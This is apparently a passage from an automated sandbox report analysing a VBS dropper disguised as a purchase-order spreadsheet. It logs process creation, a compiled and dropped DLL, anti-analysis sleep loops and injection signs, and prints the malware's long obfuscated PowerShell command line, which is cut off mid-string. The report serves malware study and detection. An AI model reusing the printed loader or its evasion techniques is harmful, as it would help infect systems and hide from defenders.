Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline			Jump to behavior

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.dll

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Potential evasive VBS script found (use of timer() function in loop)

Source: Initial file

Initial file: do while timer-temp<sec

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 8552

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4424

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.dll

Jump to dropped file

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: powershell.exe, 00000003.00000002.848528611.0000000004E65000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: powershell.exe, 00000003.00000002.848528611.0000000004E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ek:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: PO-09784893 xlsx.vbs	Binary or memory string: Vi5 = Vi5 & "PfHgv1gZ0V47ceC/XXOMbhGfSDCj6sDBrf5"
Source: wscript.exe, 00000000.00000003.310056094.0000023F74611000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.311867684.0000023F74614000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $gv2vrlqbBKC7P5QEMU7i3QMPR0oRCnNDQXznLUTAHANDLEX?lt?
Source: wscript.exe, 00000000.00000003.309917173.0000023F746D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #PfHgv1gZ0V47ceC/XXOMbhGfSDCj6sDBrf51i
Source: PO-09784893 xlsx.vbs	Binary or memory string: Vi5 = Vi5 & "gv2vrlqbBKC7P5QEMU7i3QMPR0oRCnNDQXzn"
Source: powershell.exe, 00000003.00000002.840675760.0000000004931000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ek:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V4

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$saudiarabiske = """koaeldmedpo-cetphysuplneph eg-frtfoycepspegrdteefafsairenspipltseiufoslnra je'drublsliiminingax ajsmoyteszatinenemug;spulesunisonungmu trspoyelsinthaekomtr.svrkiuhenhategisimkaesh.moicanpitoxeterstofeptesareefrskvfoishcgaebesfo;fopkoubabselstihoclv masafttrarutseibecad mecvelsaaxysausbr ostsehliwbuakorhutabnbeebesbusun1ce sa{tr[madanlomlspivemarpsuoseruttfr(st`"""peaundoovedastpunifo3nd2la.cudgelrulci`"""cl)bl]brpasuvibbolisiudcwa unsbetsuaimtafifucbi haeslxtotboetjrsunkt reivinsottu spgreeaftudsovelarudvcoivactieskkstesaycininawempreta(noinongrtco omnanotaymoicaspllma,griapnintal alssellagsptsm6pe9fo,biiurnbetpi kraisffifliainlpo,maibenmottr asbteagaglaany)ma;sc[sodchldelngigommiptiovarkutpa(sa`"""skgwhdboise3vi2pe`"""sn)ka]bepkrurabkllibifecsl fosbetadaartgrihvcem drehaxsatseeasrbrnda aaiafnlotov begnaesothjcamlrgibupsarmagconre(skibanrathe komekutalla,stiauncetet trgmagpyeunganufi)wo;ub[ubdcalexlstiromcipreocardyttr(se`"""cakdiesarsenplemalbi3tr2si`"""tr)be]jopbruyabsolauilacdi disljtskaemttuiovcbe aterexsttdreatrfonwe fliunnpattapsttverar saepinlsumemunshayabsdotasetumspldroadcvoasllstedksbawsa(rausviopnaltko mevpe1du,moiunnheter plvsn2ta)du;he[cadfolgylraiecmarpanobrrqutfe(li`"""sykbaeskravnkaemilsk3mo2de`"""di)fa]prpcoubebanlafihycun alshjthyadrtmiiuncpi ceestxkytkaealrkonac ariblncatse hugsilpsosebefapllemdmaesalheesatbreprasmtguofimun(puiaenfotdr teptrrtlede1to5sa1co)sk;ha[badevleultridemhopsaofarnottr(ca`"""akgpidplifi3sc2re`"""aa)da]sapekuapbtalreihacpr nosoptsrasktstisqcak eneaaxsptfoetardensp arisenovtbe flsfotenrunoaeksheboablntadpafgeisolanlblposaavtunhpr(diiddnartkl acekrtluhwiyunlhj8bl7du)bi;qu[nodkrlunlekiapmempsyoinrgltcy(sa`"""seumospeeafrpa3bl2in`"""ko)un]jrpdiurebsklnoisncsc spsfutstasetfaiklcme ueedexudtcoeunrjanst ininonfltrh grcinlskoinsbiepycdalsuimopetbenotaatarbedpa(ku)un;yn[chdagllrloticamcopsaoghrmatba(sp`"""pawtriarnresgapdeoanosplti.brdexrobvsp`"""un)dr]oppheuinbunlceicocst unssetceafotdiistcme stepaxwatlaebrrrenov paistncotru plsencluhteenodtrutaldaedrjmaoprbtr(beitynoltkl knufanafokovcoestrel2br2kl6re,ininonretko piamikwetstiwa)mu;dd[afdunlsllspivomrepnootrrchtol(cy`"""geaandprvegalipseifo3sp2re.rydovlajlre`"""do)st]typnaurabmelpoilocbu plsfitmiapatscipecta diestxbotdrehurmenal mlifanbltci trqmoufaeerraryvoshaekorkrvtsileckuefacudoafnprfliisughe(muifonpitho prrtheengofleseatrfi,liiinngrtfu opcenogasac0ti,baiminsttsh grddrispsdepreoovssu,coirintatin nonpearupunhleoer2ho7no)mo;un[indhalafluviafmcoppaospruntto(co`"""irwalisknmisovppeonooaalre.sldmorklvfo`"""st)se]copfoucrbbilopiskcsk kasovtblaantfriomcma unesuxenttrelyrdenbe veifonritca hadciouncgruremdremunwetsepfirslolippaevkrputiniteeensve(boiaanlitwo wifuvotarbesat,foivennitsa grlsuanonusgsorbeesi,foiyunmitou stsobkrerheisevtv,frigantetto buhghekamex,waialnantan messearhmerbduagrftu,seislnuntex morreesitspiau)fr;dr[whdamlrelku
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$saudiarabiske = """koaeldmedpo-cetphysuplneph eg-frtfoycepspegrdteefafsairenspipltseiufoslnra je'drublsliiminingax ajsmoyteszatinenemug;spulesunisonungmu trspoyelsinthaekomtr.svrkiuhenhategisimkaesh.moicanpitoxeterstofeptesareefrskvfoishcgaebesfo;fopkoubabselstihoclv masafttrarutseibecad mecvelsaaxysausbr ostsehliwbuakorhutabnbeebesbusun1ce sa{tr[madanlomlspivemarpsuoseruttfr(st`"""peaundoovedastpunifo3nd2la.cudgelrulci`"""cl)bl]brpasuvibbolisiudcwa unsbetsuaimtafifucbi haeslxtotboetjrsunkt reivinsottu spgreeaftudsovelarudvcoivactieskkstesaycininawempreta(noinongrtco omnanotaymoicaspllma,griapnintal alssellagsptsm6pe9fo,biiurnbetpi kraisffifliainlpo,maibenmottr asbteagaglaany)ma;sc[sodchldelngigommiptiovarkutpa(sa`"""skgwhdboise3vi2pe`"""sn)ka]bepkrurabkllibifecsl fosbetadaartgrihvcem drehaxsatseeasrbrnda aaiafnlotov begnaesothjcamlrgibupsarmagconre(skibanrathe komekutalla,stiauncetet trgmagpyeunganufi)wo;ub[ubdcalexlstiromcipreocardyttr(se`"""cakdiesarsenplemalbi3tr2si`"""tr)be]jopbruyabsolauilacdi disljtskaemttuiovcbe aterexsttdreatrfonwe fliunnpattapsttverar saepinlsumemunshayabsdotasetumspldroadcvoasllstedksbawsa(rausviopnaltko mevpe1du,moiunnheter plvsn2ta)du;he[cadfolgylraiecmarpanobrrqutfe(li`"""sykbaeskravnkaemilsk3mo2de`"""di)fa]prpcoubebanlafihycun alshjthyadrtmiiuncpi ceestxkytkaealrkonac ariblncatse hugsilpsosebefapllemdmaesalheesatbreprasmtguofimun(puiaenfotdr teptrrtlede1to5sa1co)sk;ha[badevleultridemhopsaofarnottr(ca`"""akgpidplifi3sc2re`"""aa)da]sapekuapbtalreihacpr nosoptsrasktstisqcak eneaaxsptfoetardensp arisenovtbe flsfotenrunoaeksheboablntadpafgeisolanlblposaavtunhpr(diiddnartkl acekrtluhwiyunlhj8bl7du)bi;qu[nodkrlunlekiapmempsyoinrgltcy(sa`"""seumospeeafrpa3bl2in`"""ko)un]jrpdiurebsklnoisncsc spsfutstasetfaiklcme ueedexudtcoeunrjanst ininonfltrh grcinlskoinsbiepycdalsuimopetbenotaatarbedpa(ku)un;yn[chdagllrloticamcopsaoghrmatba(sp`"""pawtriarnresgapdeoanosplti.brdexrobvsp`"""un)dr]oppheuinbunlceicocst unssetceafotdiistcme stepaxwatlaebrrrenov paistncotru plsencluhteenodtrutaldaedrjmaoprbtr(beitynoltkl knufanafokovcoestrel2br2kl6re,ininonretko piamikwetstiwa)mu;dd[afdunlsllspivomrepnootrrchtol(cy`"""geaandprvegalipseifo3sp2re.rydovlajlre`"""do)st]typnaurabmelpoilocbu plsfitmiapatscipecta diestxbotdrehurmenal mlifanbltci trqmoufaeerraryvoshaekorkrvtsileckuefacudoafnprfliisughe(muifonpitho prrtheengofleseatrfi,liiinngrtfu opcenogasac0ti,baiminsttsh grddrispsdepreoovssu,coirintatin nonpearupunhleoer2ho7no)mo;un[indhalafluviafmcoppaospruntto(co`"""irwalisknmisovppeonooaalre.sldmorklvfo`"""st)se]copfoucrbbilopiskcsk kasovtblaantfriomcma unesuxenttrelyrdenbe veifonritca hadciouncgruremdremunwetsepfirslolippaevkrputiniteeensve(boiaanlitwo wifuvotarbesat,foivennitsa grlsuanonusgsorbeesi,foiyunmitou stsobkrerheisevtv,frigantetto buhghekamex,waialnantan messearhmerbduagrftu,seislnuntex morreesitspiau)fr;dr[whdamlrelku			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi 